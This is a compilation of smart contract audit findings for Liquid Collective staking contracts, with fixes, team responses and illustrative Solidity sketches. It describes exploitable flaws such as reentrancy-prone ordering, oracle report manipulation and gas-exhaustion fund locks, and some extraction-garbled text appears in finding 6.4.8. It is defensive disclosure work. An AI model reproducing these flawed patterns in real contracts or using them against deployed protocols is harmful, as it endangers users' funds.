• Missing part of the natspec comment for /// @notice Attempt to revoke at a relative to InvalidRevokedVestingScheduleEnd in IVestingScheduleManager.
• Natspec missing the @return part for getVestingSchedule in IVestingScheduleManager.
• Wrong order of natspec @param for createVestingSchedule in IVestingScheduleManager. The @param _beneficiary should be placed before @param _delegatee to follow the function signature order.
• Natspec missing the @return part for delegateVestingEscrow in IVestingScheduleManager.
• Wrong natspec comment: operators should be replaced with vesting schedules for the @custom:attribute of struct SlotVestingSchedule in VestingSchedules.
• Wrong natspec parameter: replace operator with vesting schedule in the VestingSchedules.push function.
• Missing @return natspec for _delegateVestingEscrow in ERC20VestableVotesUpgradeable.
• Missing @return natspec for _deterministicVestingEscrow in ERC20VestableVotesUpgradeable.
• Missing @return natspec for _getCurrentTime in ERC20VestableVotesUpgradeable.
• Add the Coverage Funds as a source of "extra funds" in the Oracle._pushToRiver natspec documentation in Oracle.
• Update the InvalidCall natspec in ICoverageFundV1 given that the error is thrown also in the receive() external payable function of CoverageFundV1.
• Update the natspec of the struct VestingSchedule lockDuration attribute in VestingSchedules by explaining that the lock duration of a vesting schedule could possibly exceed the overall duration of the vesting.
• Update the natspec of lockDuration in ERC20VestableVotesUpgradeable by explaining that the lock duration of a vesting schedule could possibly exceed the overall duration of the vesting.
• Consider making the natspec documentation of struct VestingSchedule in VestingSchedules and the natspec in ERC20VestableVotesUpgradeable be in sync.
• Add more examples (variations) to the natspec documentation of the vesting schedules example in ERC20VestableVotesUpgradeable to explain all the possible combinations of scenarios.
• Make the ERC20VestableVotesUpgradeable natspec documentation about the vesting schedule consistent with the natspec documentation of _createVestingSchedule and the VestingSchedules struct VestingSchedule.
Typos:
• Replace all Overriden instances with Overridden in River.
• Replace transfer with transfers in ERC20VestableVotesUpgradeable.1.sol#L147.
• Replace token with tokens in ERC20VestableVotesUpgradeable.1.sol#L156.
Recommendation: Consider adding or updating the relevant natspec where needed, and fix the typos.
Alluvial: Recommendation has been implemented in PR 172.
Spearbit: Fixed.
+7.5.21 Different behavior between River _pullELFees and _pullCoverageFunds
Severity: Informational
Context:
• River.1.sol#L254-L265
• River.1.sol#L270-L283
Description: Both _pullELFees and _pullCoverageFunds implement the same functionality:
• Pull funds from a contract address.
• Update the balance storage variable.
• Emit an event.
• Return the amount of balance collected from the contract.
The _pullCoverageFunds implementation differs from _pullELFees by avoiding both updating the BalanceToDeposit when collectedCoverageFunds == 0 and emitting the PulledCoverageFunds event. Because they implement the same functionality, they should follow the same behavior unless there is an explicit reason not to.
Recommendation: Consider applying the same behavior to both _pullELFees and _pullCoverageFunds, or explain the reason why they should differ. Consider emitting the PulledCoverageFunds event even when collectedCoverageFunds == 0 if you think it should be an event to be monitored even when no funds were pulled from the contract.
Spearbit: With PR 168 Alluvial has changed _pullELFees to follow the same behavior as _pullCoverageFunds. With the new implementation, both functions do not update the unstructured storage variable value and do not fire the event if the collected funds are equal to zero. Alluvial has acknowledged that with the current implementation, they are not emitting and monitoring those cases where the OracleManager requests non-zero funds to be pulled but there are no funds in the EL Fees or Coverage Fund contracts to be pulled.
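One way to guarantee that two such paths stay in sync is to route both through a single internal helper. The sketch below is illustrative only (IPullable, _pullFunds, and _increaseBalanceToDeposit are hypothetical names, not the protocol's API), assuming the post-PR-168 behavior of skipping both the storage update and the event on zero-amount pulls:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Illustrative sketch: a shared helper so the EL-fees and coverage-fund
    // pull paths cannot diverge. Names are hypothetical.
    interface IPullable {
        function pull(uint256 maxAmount) external returns (uint256);
    }

    abstract contract PullFundsSketch {
        event PulledFunds(address indexed source, uint256 amount);

        function _pullFunds(address source, uint256 maxAmount) internal returns (uint256 collected) {
            collected = IPullable(source).pull(maxAmount);
            // single place that decides the zero-amount behavior for both callers
            if (collected > 0) {
                _increaseBalanceToDeposit(collected);
                emit PulledFunds(source, collected);
            }
        }

        // bookkeeping hook implemented by the inheriting contract
        function _increaseBalanceToDeposit(uint256 amount) internal virtual;
    }

With this shape, changing the zero-amount policy (for example, deciding to emit the event anyway for monitoring) is a one-line change that affects both callers identically.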
+7.5.22 Move local mask variable from Allowlist.1.sol to LibAllowlistMasks.sol
Severity: Informational
Context: Allowlist.1.sol#L21, LibAllowlistMasks.sol
Description: LibAllowlistMasks.sol is meant to contain all mask values, but DENY_MASK is a local variable in the Allowlist.1.sol contract.
Recommendation: Move the DENY_MASK variable to LibAllowlistMasks.sol and make the necessary changes to Allowlist.1.sol.
Alluvial: Very good point and clearly a miss from our end. Fixed in PR 166.
Spearbit: Fixed.
+7.5.23 Consider adding additional parameters to the existing events to improve filtering/monitoring
Severity: Informational
Context:
• IVestingScheduleManager.1.sol#L15
• IVestingScheduleManager.1.sol#L20
• IVestingScheduleManager.1.sol#L25
• IVestingScheduleManager.1.sol#L31
Description: Some already defined events could be improved by adding more parameters to better track those events in dApps or monitoring tools.
• Consider adding address indexed delegatee as an event parameter to event CreatedVestingSchedule. While it's true that after the vest/lock period the beneficiary will be the owner of those tokens, in the meantime (if _delegatee != address(0)) the voting power of all those vested tokens is delegated to the _delegatee.
• Consider adding address indexed beneficiary to event ReleasedVestingSchedule.
• Consider adding uint256 newEnd to event RevokedVestingSchedule to track the updated end of the vesting schedule.
• Consider adding address indexed beneficiary to event DelegatedVestingEscrow.
If those event parameters are added, the Alluvial team should also remember to update the relative natspec documentation.
Recommendation: Consider adding the suggested parameters to the relative events and updating the natspec documentation where needed.
Spearbit: In PR 172, Alluvial has implemented part of the recommendations:
• Added additional parameter uint256 newEnd to the event RevokedVestingSchedule.
• Added additional parameter address indexed beneficiary to the event DelegatedVestingEscrow.
+7.5.24 Missing indexed keyword in events parameters
Severity: Informational
Context:
• IRiver.1.sol#L27
• IVestingScheduleManager.1.sol#L31
• ICoverageFund.1.sol#L15
Description: Some event parameters are missing the indexed keyword. Indexing specific parameters is particularly important to later be able to filter those events both in dApps and in monitoring tools.
• The coverageFund event parameter should be declared as indexed in event SetCoverageFund.
• Both oldDelegatee and newDelegatee should be indexed in event DelegatedVestingEscrow.
• donator should be declared as indexed in event Donate.
Recommendation: Declare the specified event parameters as indexed where needed.
Alluvial: Recommendation has been implemented in PR 168 and PR 172.
Spearbit: Fixed.
+7.5.25 Add natspec documentation to the TLC contract
Severity: Informational
Context: TLC.1.sol
Description: The current implementation of the TLC contract is missing natspec at the root level to explain the contract. The natspec should cover the basic explanation of the contract (as has already been done in other contracts like River.sol) but also illustrate:
• TLC token has a fixed max supply that is minted at deploy time.
• All the minted tokens are sent to a single account at deploy time.
• How the TLC token will be distributed.
• How voting power works (you have to delegate to yourself to gain voting power).
• How the vesting process works.
• Other general information useful for the user/investor that receives the TLC token directly or vested.
Recommendation: Add natspec documentation to the TLC contract to explain what the contract does and how TLC tokens are minted, distributed, and used.
Alluvial: Recommendation has been implemented in PR 172.
Spearbit: Fixed.
diff --git a/findings_newupdate/spearbit/LiquidCollective3-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LiquidCollective3-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..2b71f73
--- /dev/null
+++ b/findings_newupdate/spearbit/LiquidCollective3-Spearbit-Security-Review.txt
@@ -0,0 +1,49 @@
+6.1.1 _pickNextValidatorsToExitFromActiveOperators uses the wrong index to query stopped validator count for operators
Severity: Critical Risk
Context: OperatorsRegistry.1.sol#L628
Description: In _pickNextValidatorsToExitFromActiveOperators, OperatorsV2.CachedOperator[] memory operators does not necessarily have the same order as the actual OperatorsV2's operators, since the ones that don't have _hasExitableKeys will be skipped (the operator might not be active or all of its funded keys might have been requested to exit). And so when querying the stopped validator counts in
for (uint256 idx = 0; idx < exitableOperatorCount;) {
    uint32 currentRequestedExits = operators[idx].requestedExits;
    uint32 currentStoppedCount = _getStoppedValidatorsCountFromRawArray(stoppedValidators, idx);
one should not use the idx of the cached operators array, but the cached index of this array element, as the indexes of stoppedValidators correspond to the actual stored operators array in storage. Note that when emitting the UpdatedRequestedValidatorExitsUponStopped event, the correct index has been used.
Recommendation: The calculation for currentStoppedCount needs to be corrected to use operators[idx].index:
uint32 currentStoppedCount = _getStoppedValidatorsCountFromRawArray(stoppedValidators, operators[idx].index);
Also, since this was not caught by test cases, it would be best to add some passing and failing test cases for _pickNextValidatorsToExitFromActiveOperators.
Liquid Collective: Fixed in commit a109a1.
Spearbit: Verified.
+6.1.2 Oracles' reports votes are not stored in storage
Severity: Critical Risk
Context: Oracle.1.sol#L268
Description: The purpose of Oracle.1.sol is to facilitate the reporting and quorum of oracles. Oracles periodically add their reports, and when consensus is reached the setConsensusLayerData function (which is a critical component of the system) is called. However, there is an issue with the current implementation: ReportVariants holds the reports made by oracles, but ReportVariants.get() returns a memory array instead of a storage array, resulting in an increase in votes that will not be stored at the end of the transaction and preventing setConsensusLayerData from being called. This is a regression bug that should have been detected by a comprehensive test suite.
Recommendation: Short term, modify ReportVariants.get() so that it returns a storage array instead of a memory array. By returning a storage array we can ensure that any increase in votes will be persisted to the blockchain and that setConsensusLayerData will be called when a quorum is reached. Long term, make sure to have a comprehensive test suite with high code coverage that is incorporated as part of the CI/CD process.
Liquid Collective: Fixed in commit f73551 by following the auditor's recommendation.
Spearbit: Verified.
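The class of bug in 6.1.2 is easy to reproduce in isolation. A minimal self-contained sketch (contract and member names are ours, not the protocol's) showing why incrementing a vote count on a memory copy is silently lost, while a storage reference persists:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Minimal repro sketch of the memory-vs-storage regression class; names hypothetical.
    contract VotesSketch {
        struct ReportVariant { bytes32 reportHash; uint256 votes; }
        ReportVariant[] internal variants;

        function add(bytes32 reportHash) external {
            variants.push(ReportVariant(reportHash, 0));
        }

        // BUG: returns a copy; any mutation by the caller only touches memory.
        function getMemory(uint256 i) internal view returns (ReportVariant memory) {
            return variants[i];
        }

        // FIX: returns a storage pointer; mutations write through to state.
        function getStorage(uint256 i) internal view returns (ReportVariant storage) {
            return variants[i];
        }

        function voteBuggy(uint256 i) external {
            ReportVariant memory v = getMemory(i);
            v.votes += 1; // lost when the transaction ends
        }

        function voteFixed(uint256 i) external {
            ReportVariant storage v = getStorage(i);
            v.votes += 1; // persisted
        }

        function votes(uint256 i) external view returns (uint256) {
            return variants[i].votes; // stays 0 after voteBuggy, increments after voteFixed
        }
    }

A test that calls voteBuggy until the quorum threshold and then asserts the stored vote count would have caught the regression, which is what the long-term recommendation above is pointing at.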
6.2 High Risk
+6.2.1 User's LsETH might be locked due to out-of-gas error during recursive calls
Severity: High Risk
Context: RedeemManager.1.sol#L417
Description: Let W0, W1, ... W7 represent the withdrawal events in the withdrawal stack, and let R0, R1, R2 represent the users' redeem requests in the redeem queue. Assume that Alice is the owner of R1. When Alice called the resolveRedeemRequests function against R1, it resolved to W1. Next, Alice called the _claimRedeemRequest function with R1 and its corresponding W1. _claimRedeemRequest will first process W1. At the end of the function, it will check if W1 covers the full amount of R1. If not, it will call the _claimRedeemRequest function recursively with the same request id (R1) but an incremented withdrawal event id (W2 = W1 + 1). The _claimRedeemRequest function recursively calls itself until the full amount of the redeem request is "expended" or the next withdrawal event does not exist. In the above example, _claimRedeemRequest will be called 7 times with W1 ... W7, until the full amount of R1 is "expended" (R1.amount == 0). However, if the amount of a redeem request is large (e.g. 1000 LsETH), and this redeem request is satisfied by many small chunks of withdrawal events (e.g. one withdrawal event consists of less than 10 LsETH), then the recursion depth will be large. The function will keep calling itself recursively until an out-of-gas error happens. If this happens, there is no way to claim the redemption request, and the user's LsETH will be locked. In the current implementation, users cannot break the claim into smaller chunks to overcome the gas limit. In the above example, if Alice attempts to break the claim into smaller chunks by first calling the _claimRedeemRequest function with R1 and its corresponding W5, the _isMatch function within it will revert.
Recommendation: Consider allowing the users to break the claim into smaller chunks to overcome the gas limit.
Liquid Collective: Fixed in commit e8ca5d.
Spearbit: Verified.
6.3 Medium Risk
+6.3.1 Allowed users can directly transfer their share to RedeemManager
Severity: Medium Risk
Context: RedeemManager.1.sol#L280-L281, SharesManager.1.sol#L105, SharesManager.1.sol#L119
Description: An allowed user can directly transfer their shares to the RedeemManager without requesting a redeem. This would cause the withdrawal stack to grow, since the redeem demand, which is calculated based on the RedeemManager's share of LsETH, increases. The RedeemQueue would be untouched in this case. In case of an accidental mistake by a user, the locked shares can only be retrieved by a protocol update.
Recommendation: Make sure SharesManager does not allow users to directly transfer their shares to the RedeemManager unless the call to transferFrom is made by the RedeemManager.
Liquid Collective: Fixed.
Spearbit: This issue has been addressed by introducing a storage variable RedeemDemand that keeps track of the redeem demand for the redeem manager contract:
• commit dda655
• commit bc3afe
It does not address the issue that shares can be directly transferred to the redeem manager by a user.
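A hedged sketch of the recommended guard for 6.3.1 (all names are illustrative; the real SharesManager hook and error types may differ), rejecting share transfers whose destination is the RedeemManager unless the RedeemManager itself is the caller:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Illustrative guard only; hook, state, and error names are hypothetical.
    contract SharesTransferGuardSketch {
        address public immutable redeemManager;

        error UnauthorizedTransferToRedeemManager(address from);

        constructor(address redeemManager_) {
            redeemManager = redeemManager_;
        }

        // would be invoked from transfer/transferFrom before balances move
        function _onTransfer(address from, address to) internal view {
            // only the RedeemManager may move shares onto its own balance,
            // which is what happens during a legitimate redeem-request flow
            if (to == redeemManager && msg.sender != redeemManager) {
                revert UnauthorizedTransferToRedeemManager(from);
            }
        }
    }

This complements the RedeemDemand bookkeeping introduced in the remediation: the storage variable keeps the demand accounting correct, while a guard like the above would also prevent the shares from being stranded in the first place.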
+6.3.2 Invariants are not enforced for stopped validator counts
Severity: Medium Risk
Context: OperatorsRegistry.1.sol#L419-L440
Description: _setStoppedValidatorCounts does not enforce the following invariants:
• stoppedValidatorCounts[0] <= DepositedValidatorCount.get()
• stoppedValidatorCounts[i] needs to be a non-decreasing function when viewed on a timeline
• stoppedValidatorCounts[i] needs to be less than or equal to the funded number of validators for the corresponding operator.
Currently, the oracle members can report values that would break these invariants. As a consequence, the oracle members can signal the operators to exit more or fewer validators by manipulating the preExitingBalance value. The activeCount for the exiting-validators picking algorithm can also be manipulated per operator.
Recommendation: Make sure the invariants mentioned above are enforced on-chain before oracle reports get used and/or stored.
Liquid Collective: Fixed in PR 195.
Spearbit: Verified.
+6.3.3 Potential out of gas exceptions
Severity: Medium Risk
Context: OracleManager.1.sol#L432, OperatorsRegistry.1.sol#L529
Description: The purpose of _requestExitsBasedOnRedeemDemandAfterRebalancings is to release liquidity for withdrawals made in the RedeemManager contract. The function prioritizes liquidity sources, starting with BalanceToRedeem and then BalanceToDeposit, before asking validators to exit. However, if the validators are needed to release more liquidity, the function uses pickNextValidatorsToExit to determine which validators to ask to exit. This process can be quite gas-intensive, especially if the number of validators is large. The gas consumption of this function depends on several factors, including exitableOperatorCount, stoppedValidators.length, and the rate of decrease of _count. These factors may increase over time, and the msg.sender does not have control over them. The function includes two nested loops that contribute to the overall gas consumption, and this can be problematic for certain inputs. For example, if the operators array has no duplications and the difference between values is exactly 1, such as [n, n-1, n-2, ... n-k] where n can be any number and k is a large number equal to exitableOperatorCount - 1 and _count is also large, the function can become extremely gas-intensive. The main consequence of such a potential issue is that the function may not release enough liquidity to the RedeemManager contract, resulting in partial fulfillment of redemption requests. Similarly, _pickNextValidatorsToDepositFromActiveOperators is also very gas-intensive. If the number of desired validators and current operators (including fundable operators) are high enough, depositToConsensusLayer is no longer callable.
Recommendation: To address the potential gas consumption issue with _requestExitsBasedOnRedeemDemandAfterRebalancings, the following steps can be considered:
1. Allow _requestExitsBasedOnRedeemDemandAfterRebalancings to be called independently and not just as part of setConsensusLayerData.
2. Currently, the _count parameter is dependent on several variables that cannot be determined by the caller, including redeemManagerDemandInEth, availableBalanceToRedeem, exitingBalance, and preExitingBalance. To improve efficiency, it would be better to allow the caller to specify a value for _count and use the minimum value between the caller's input and validatorCountToExit to determine the number of validators to exit.
3.
It's important to run tests to measure and monitor the worst-case scenario, particularly around the while (_count > 0) { ... } section. If necessary, consider replacing the decision algorithm with a more efficient approach to reduce gas consumption.
For _pickNextValidatorsToDepositFromActiveOperators:
1. Similar to the previous suggestion, allow it to run independently from depositToConsensusLayer.
2. Consider using a min heap to select operators with the lowest active validator count.
Liquid Collective: The process for picking validators to exit upon report quorum is broken into 2 or more transactions now by introducing the following functions:
• demandValidatorExits
• requestValidatorExits
in PR 195. Recommendations not applied for _pickNextValidatorsToDepositFromActiveOperators.
Spearbit: Verified.
6.4 Low Risk
+6.4.1 The validator count to exit in _requestExitsBasedOnRedeemDemandAfterRebalancings assumes that the to-be selected validators are still active and have not been penalised.
Severity: Low Risk
Context: River.1.sol#L568-L571
Description: The validatorCountToExit is calculated as follows:
uint256 validatorCountToExit = LibUint256.ceil(
    redeemManagerDemandInEth - (availableBalanceToRedeem + exitingBalance + preExitingBalance),
    DEPOSIT_SIZE
);
This formula assumes that the to-be-selected validators picked by pickNextValidatorsToExit:
1. Are still active,
2. Have not been queued to be exited, and
3. Have not been penalized, and their balance is at least MAX_EFFECTIVE_BALANCE.
Recommendation: Just like the stopped validator count, the oracles could report back more granular data, including consensus layer balances per validator, to make sure the exit strategy for the validators roughly guarantees the current redeem demand. This would still not be perfect, since there will always be a lag/delay between the reported data by oracles for a past epoch and the current balances on the validators.
Liquid Collective: This would be pretty hard to implement; we're ok to not have this accuracy and have a protocol able to respond in an async manner to possible deltas between demand and actual volume. Here, requesting a 32 ETH exit, if only ~20 are entering the exiting balance buffer, we are going to request another exit on the next report.
Spearbit: Acknowledged.
+6.4.2 Burn RedeemManager's share first before calling its reportWithdraw endpoint
Severity: Low Risk
Context: River.1.sol#L509-L518
Description: The current implementation of _reportWithdrawToRedeemManager calls RedeemManager's reportWithdraw and then burns the corresponding shares for the RedeemManager:
// perform a report withdraw call to the redeem manager
redeemManager_.reportWithdraw{value: suppliedRedeemManagerDemandInEth}(suppliedRedeemManagerDemand);
// we burn the shares of the redeem manager associated with the amount of eth provided
_burnRawShares(address(RedeemManagerAddress.get()), suppliedRedeemManagerDemand);
Recommendation: To avoid potential future reentrancy from the RedeemManager, it would be best to burn the shares first and then call the reportWithdraw endpoint:
// we burn the shares of the redeem manager associated with the amount of eth provided
_burnRawShares(address(RedeemManagerAddress.get()), suppliedRedeemManagerDemand);
// perform a report withdraw call to the redeem manager
redeemManager_.reportWithdraw{value: suppliedRedeemManagerDemandInEth}(suppliedRedeemManagerDemand);
Liquid Collective: Fixed in commit e47cb8.
Spearbit: Verified.
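The ordering rule behind 6.4.2 is the standard checks-effects-interactions pattern. A compact sketch of the safe ordering in isolation (interface and helper names are ours; only reportWithdraw's shape follows the snippet above):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Illustrative checks-effects-interactions sketch; names other than
    // reportWithdraw are hypothetical.
    interface IRedeemManagerLike {
        function reportWithdraw(uint256 suppliedDemand) external payable;
    }

    abstract contract SettleSketch {
        function _settle(address redeemManager, uint256 shares, uint256 eth) internal {
            // effect first: internal accounting is final before control leaves this
            // contract, so a re-entering RedeemManager cannot observe stale share state
            _burnRawShares(redeemManager, shares);
            // interaction last
            IRedeemManagerLike(redeemManager).reportWithdraw{value: eth}(shares);
        }

        function _burnRawShares(address account, uint256 amount) internal virtual;
    }

The same principle is recommended again in 6.4.5 and 6.4.6 below: finish every state update before the first external call of the transaction's critical section.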
+6.4.3 OracleManager allows reporting for the same epoch multiple times, leading to unknown behavior.
Severity: Low Risk
Context: OracleManager.1.sol#L463
Description: Currently, it is possible for the oracle to report on the same epoch multiple times, because _isValidEpoch checks that the report's epoch >= LastConsensusLayerReport.get().epoch. This can lead the contract to unspecified behavior:
• The code will revert if the report increases the balance, not with an explicit check but due to a subtraction underflow, since maxIncrease == 0, and
• Other code paths are allowed to execute to completion.
Recommendation: Explicitly disallow this execution path by using a strictly increasing criterion:
- epoch >= LastConsensusLayerReport.get().epoch
+ epoch > LastConsensusLayerReport.get().epoch
Liquid Collective: Fixed in PR 193.
Spearbit: Verified.
+6.4.4 Missing event emit when user calls deposit
Severity: Low Risk
Context: UserDepositManager.1.sol#L50, River.1.sol#L435
Description: Whenever BalanceToDeposit is updated, the protocol should emit a SetBalanceToDeposit event, but when a user calls UserDepositManager.deposit, the event is never emitted, which could break tooling.
Recommendation: Instead of setting the value of the variable directly, call the River._setBalanceToDeposit function, since it emits the event:
/// @notice Sets the balance to deposit, but not yet committed
/// @param newBalanceToDeposit The new balance to deposit value
function _setBalanceToDeposit(uint256 newBalanceToDeposit) internal override(UserDepositManagerV1) {
    emit SetBalanceToDeposit(BalanceToDeposit.get(), newBalanceToDeposit);
    BalanceToDeposit.set(newBalanceToDeposit);
}
Liquid Collective: Fixed in PR 196.
Spearbit: Verified.
+6.4.5 Reset the report data and increment the last epoch id before calling River's setConsensusLayerData when a quorum is made
Severity: Low Risk
Context: Oracle.1.sol#L254-L263
Description: The current implementation of reportConsensusLayerData calls river.setConsensusLayerData(report) first when a quorum is made, then resets the report variant and position data, and increments the last epoch id afterward:
// if adding this vote reaches quorum
if (variantVotes + 1 >= quorum) {
    // we push the report to river
    river.setConsensusLayerData(report);
    // we clear the reporting data
    _clearReports();
    // we increment the lastReportedEpoch to force reports to be on the last frame
    LastEpochId.set(lastReportedEpochValue + 1);
    emit SetLastReportedEpoch(lastReportedEpochValue + 1);
}
In a future version of the protocol there might be a possibility for an oracle member to call back into reportConsensusLayerData when river.setConsensusLayerData(report) is called, which would open a reentrancy for compromised/malicious oracle members.
Recommendation: It would be best to clear the reporting data and increment the last epoch id first, and then call into the River contract:
// if adding this vote reaches quorum
if (variantVotes + 1 >= quorum) {
    // we clear the reporting data
    _clearReports();
    // we increment the lastReportedEpoch to force reports to be on the last frame
    LastEpochId.set(lastReportedEpochValue + 1);
    // we push the report to river
    river.setConsensusLayerData(report);
    emit SetLastReportedEpoch(lastReportedEpochValue + 1);
}
...
+6.4.6 Update BufferedExceedingEth before calling sendRedeemManagerExceedingFunds Severity: Low Risk Context: RedeemManager.1.sol#L157-L158 Description: In pullExceedingEth , River's sendRedeemManagerExceedingFunds is called before updating the RedeemManager's BufferedExceedingEth storage value _river().sendRedeemManagerExceedingFunds{value: amountToSend}(); BufferedExceedingEth.set(BufferedExceedingEth.get() - amountToSend); Recommendation: It would be best to update it before calling River to avoid future bookkeeping mistakes through unwanted reentrancy BufferedExceedingEth.set(BufferedExceedingEth.get() - amountToSend); _river().sendRedeemManagerExceedingFunds{value: amountToSend}(); pullCoverageFunds follow this suggestion and also only updates and send funds if amountToSend is non-zero. Liquid Collective: Fixed in commit b92b87. Spearbit: Verified. +6.4.7 Any oracle member can censor almost quorum report variants by resetting its address Severity: Low Risk Context: Oracle.1.sol#L189-L201 Description: The admin or an oracle member can DoS or censor almost quorum reports by calling setMember endpoint which would reset the report variants and report positions. The admin also can reset the/clear the reports by calling other endpoints by that should be less of an issue compared to just an oracle member doing that. Recommendation: The protocol could • Rate limit this endpoint or • Make the endpoint only callable by a more privileged account • Disallow resetting an oracle member address close to the next upcoming frame epoch. If no action is taken to address this issue, this scenario should be documented and monitored. Liquid Collective: In commit aadbfb report data is not cleared anymore when setMember is called. Spearbit: Verified. 14 +6.4.8 Incentive mechanism that encourages operators to respond quickly to exit requests might diminish under certain condition Severity: Low Risk Context: Operators.2.sol#L158 Description: /// @notice Retrieve all the active and fundable operators /// @dev This method will return a memory array of length equal to the number of operator, but /// @dev populated up to the fundable operator count, also returned by the method /// @return The list of active and fundable operators /// @return The count of active and fundable operators function getAllFundable() internal view returns (CachedOperator[] memory, uint256) { // uint32[] storage stoppedValidatorCounts = getStoppedValidators(); for (uint256 idx = 0; idx < operatorCount;) { _hasFundableKeys(r.value[idx]) && _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits only @audit-ok File: Operators.2.sol 153: 154: ,! 155: 156: 157: 158: ,! ..SNIP.. 172: 173: 174: 175: 176: 177: ,! 178: if ( ) { r.value[idx].requestedExits is the accumulative number of requested validator exits by the protocol _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) function is a value reported by oracle members which consist of both exited and slashed validator counts It was understood the rationale of having the _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits conditional check at Line 177 above is to incentivize operators to re- In other words, an operator with a re- spond quickly to exit requests if they want new stakes from deposits. 
requestedExits value larger than the _getStoppedValidatorCountAtIndex count indicates that the operator did not submit exit requests to the Consensus Layer (CL) in a timely manner, or that the exit requests have not been finalized in CL. However, it was observed that the incentive mechanism might not work as expected in some instances. Consider the following scenario:
Assuming an operator A has 5 slashed validators and 0 exited validators, the _getStoppedValidatorCountAtIndex function will return 5 for A, since this function takes into consideration both stopped and slashed validators. Also, assume that the requestedExits of A is 5, which means that A has been instructed by the protocol to submit 5 exit requests to CL. In this case, the incentive mechanism seems to diminish, as A will still be considered a fundable operator even if A does not respond to exit requests, since the number of slashed validators is enough to "help" push up the stopped validator count to satisfy the condition, giving the wrong impression that A has already submitted the exit requests. As such, A will continue to be selected to stake new deposits.
Recommendation: Consider excluding the number of slashed validators from the total number of stopped validator counts when performing the conditional check at Line 177 of the Operator.getAllFundable function, so that one can more accurately determine the number of exit requests that the operators have responded to.
Liquid Collective: Separating exits from slashes would add a lot of complexity to the reporting process. Here we have a mechanism to catch up between stopped and requested exits, so they should be accounted for in the exiting process as well in case of an involuntary slash or exit when nothing was asked.
Spearbit: Acknowledged.
+6.4.9 RedeemManager._claimRedeemRequests transaction sender might be tricked to pay more ETH in transaction fees
Severity: Low Risk
Context: RedeemManager.1.sol#L451
Description: The _claimRedeemRequests function is designed to allow anyone to claim ETH on behalf of another party who has a valid redeem request. The function iterates through the redeemRequestIds list and fulfills each request individually. However, it is important to note that the transfer of ETH to the recipients is only limited by the 63/64 rule, which means that it is possible for a recipient to take advantage of a heavy fallback function and potentially cause the sender to pay a significant amount of unwanted transaction fees.
Recommendation: To mitigate this issue, we recommend limiting the amount of gas forwarded to the call in _claimRedeemRequests. This can be achieved by explicitly specifying the gas amount for the .call function. Implementing these measures will also inherently prevent any potential reentrancy attack vectors, although none have been discovered thus far.
Liquid Collective: This issue is acknowledged, and it will be up to the integrator in charge of sponsoring the gas to ensure that the recipients are in a known set or are EOAs. Otherwise, users will always have the ability to claim redemption requests by themselves.
Spearbit: Acknowledged.
+6.4.10 Claimable LsETH on the Withdraw Stack could exceed total LsETH requested on the Redeem Queue
Severity: Low Risk
Context: RedeemManager.1.sol#L136
Description: Let the total amount of claimable LsETH on the Withdraw Stack be x and the total amount of LsETH requested on the Redeem Queue be y.
The following points are extracted from the Withdrawals Smart Contract Architecture documentation:
• The design ensures that x <= y. Refer to page 15 of the documentation.
• It is impossible for a redeem request to be claimed before at least one Oracle report has occurred, so it is impossible to skip a slashing time penalty. Refer to page 16 of the documentation.
Based on the above information, the main purpose of the design (x <= y) is to avoid favorable treatment of LsETH holders that would request a redemption before others following a slashing incident. However, this constraint (x <= y) is not being enforced in the contract. The reporter could continue to report withdrawals via the RedeemManager.reportWithdraw function to the point where x > y. If x > y, LsETH holders could request a redemption before others following a slashing incident to gain an advantage.
Recommendation: Ensure that the constraint (x <= y) is enforced in the contract.
Liquid Collective: Fixed in PR 197.
Spearbit: Verified.
+6.4.11 An oracle member can resubmit data for the same epoch multiple times if the quorum is set to 1
Severity: Low Risk
Context: Oracle.1.sol#L232-L237, Oracle.1.sol#L261
Description: If the quorum is set to 1 and the difference between the report's epoch e and LastEpochId.get() is Δe, an oracle member will be able to call reportConsensusLayerData Δe + 1 times to push its report for epoch e to the protocol, with different data each time (the only restriction on successive reports is that the difference of underlying balance between reports would need to be negative, since the maxIncrease will be 0). Note that in reportConsensusLayerData the first storage write to LastEpochId will be overwritten later due to the quorum of one: x = LastEpochId -> report.epoch -> x + 1.
Recommendation: When the quorum is reached, update LastEpochId to be equal to report.epoch + 1:
// if adding this vote reaches quorum
if (variantVotes + 1 >= quorum) {
    // we push the report to river
    river.setConsensusLayerData(report);
    // we clear the reporting data
    _clearReports();
    // --- changes below ---
    // we increment the LastEpochId to force the next reports to be on the next frame
    LastEpochId.set(report.epoch + 1);
    emit SetLastReportedEpoch(report.epoch + 1);
}
Liquid Collective: Fixed in commit 4ab66c.
Spearbit: Verified.
+6.4.12 Report's validatorsCount's historical non-decreasingness does not get checked
Severity: Low Risk
Context: OracleManager.1.sol#L318-L321, IOracleManager.1.sol#L109, IOracleManager.1.sol#L122
Description: Once the Oracle members come to a quorum for a selected report variant, the validators count is stored in storage. Note that validatorsCount is supposed to represent the total cumulative number of validators ever funded on the consensus layer (even if they have been slashed or exited at some point). So this value is supposed to be a non-decreasing function of reported epochs. But this invariant has never been checked in setConsensusLayerData.
Recommendation: Make sure to add an if block to revert in case the reported validator count is smaller than the stored one from the previous report.
Liquid Collective: Fixed in commit 8b058b.
Spearbit: Verified.
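A minimal sketch of the suggested invariant check in 6.4.12 (names are ours; the stored field stands in for LastConsensusLayerReport.get().validatorsCount):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Illustrative invariant-check sketch; names are hypothetical.
    contract ValidatorsCountGuardSketch {
        uint32 internal lastValidatorsCount; // stands in for the stored report's validatorsCount

        error InvalidDecreasingValidatorsCount(uint32 reported, uint32 stored);

        function _checkValidatorsCount(uint32 reportedValidatorsCount) internal view {
            // validatorsCount is cumulative (validators ever funded), so it must never decrease
            if (reportedValidatorsCount < lastValidatorsCount) {
                revert InvalidDecreasingValidatorsCount(reportedValidatorsCount, lastValidatorsCount);
            }
        }
    }

The check would run before the report is stored or used, alongside the existing non-decrease checks on validatorsSkimmedBalance and validatorsExitedBalance.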
+6.4.13 The report's slashingContainmentMode and bufferRebalancingMode are decided by the oracle members which affects the exiting strategy of validators
